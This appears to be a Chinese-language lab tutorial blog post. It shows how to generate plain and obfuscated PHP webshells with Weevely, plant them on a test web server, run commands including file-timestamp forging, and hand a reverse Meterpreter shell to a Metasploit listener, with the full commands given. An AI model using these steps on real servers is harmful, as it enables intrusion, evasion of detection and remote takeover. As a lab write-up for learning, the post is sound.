
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
小实验
目的
今天使用一下kali系统下的中国菜刀
weevely
,生成木马文件、混淆木马文件控制Web服务器,并进一步
反弹shell
给metasploit做进一步控制。
实验环境
VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128
Weevely
介绍
weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP。
weevely在
linux
上使用非常给力,但是在windows上很多模块无法使用
使用
生成shell | wevely generate |
---|
连接shell | weevely [cmd] |
生成混淆shell | weevely generate -obfuscator |
实验
使用weevely生成php木马文件
weevely generate XG ~/shell.php

这里看到,生成一个大小779byte大小的PHP木马文件,密码是XG,文件名shell.php
上面生成的是
普通木马
文件,下面生成的是基于weevely模板生成的
混淆木马
,起到一定的
防查杀
作用
(实际作用不大,照样能被腾讯、360全家桶扫出来。)

weevely generate -h
查看参数,其中
-obfuscator
是用来使用混淆模板的,有两个自带模板,我们使用第二个生成木马文件shell2.php
weevely generate -obfuscator cleartext1_php XG shell2.php
将木马文件上传到被攻击web服务器
这里的上传过程看你要攻击的站点了,有文件上传漏洞,代码执行等等,反正能把木马文件上传到web目录下就行。并要知道木马所在的文件目录。
由于是我自己搭建的web,就直接拖拽进去了。开启phpstudy。

找到shell.php所在的目录

打来shell.php发现是
空白文件
,这是正常现象。能打开,说明shell.php文件能正常执行.
然后复制url链接
使用weevely连接木马文件
weevely http://192.168.1.1/shell/shell.php XG

查看ip地址,已经连接到主机192.168.1.1

同样的方式,连接生成的混淆shell2.php
控制参数
连接上shell就相当于控制服务器了,可以在weevely状态下发?来查看可以使用的命令,这里列出几个常用命令。
信息搜集::system_info收集系统信息:system_info -info client_ip whoami hostname查找自己连接的ip文件管理:file_touch 修改文件时间:file_touch -human-ts '2018-09-15 200:41:20' 文件名命令执行:shell_php 执行PHP命令:shell_php system('dir');
反向shell连接msf
连接上的weevely功能虽然很强大了,但是不要忘了更强的神器metasploit,我们可以使用weevely转发到msf进而最深度的控制服务器。
在这使用:backdoor_meterpreter参数
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444

:backdoor_meterpreter | 反向shell |
---|
-payload php/meterpreter/reverse_tcp | 是搭载的攻击载荷 |
-lhost | 转发给监听的ip地址 |
-port | 就是监听端口了 |
转发完成,接下来就是打开msf使用监听模块监听,获取控制权
use exploit/multi/handlershow payloadsset payload php/meterpreter/reverse_tcpset Lhost 192.168.1.128

最后run一下就可以监听到,并进一步控制web服务器了。
总结
weevely用起来也算是菜刀的一种变形,但是搭配起msf可以说是无敌的存在。
weevely在Linux下使用很友好,但在windows下还是使用菜刀,蚁剑和冰蝎吧。
msf控制后的使用命令特别特别多,功能特别强大,所以说msf是渗透神器嘛。(提醒一下,真正进行渗透时的ip地址,要么两个主机在同一个内网网段,要么在同一个公网,不然连接不上。)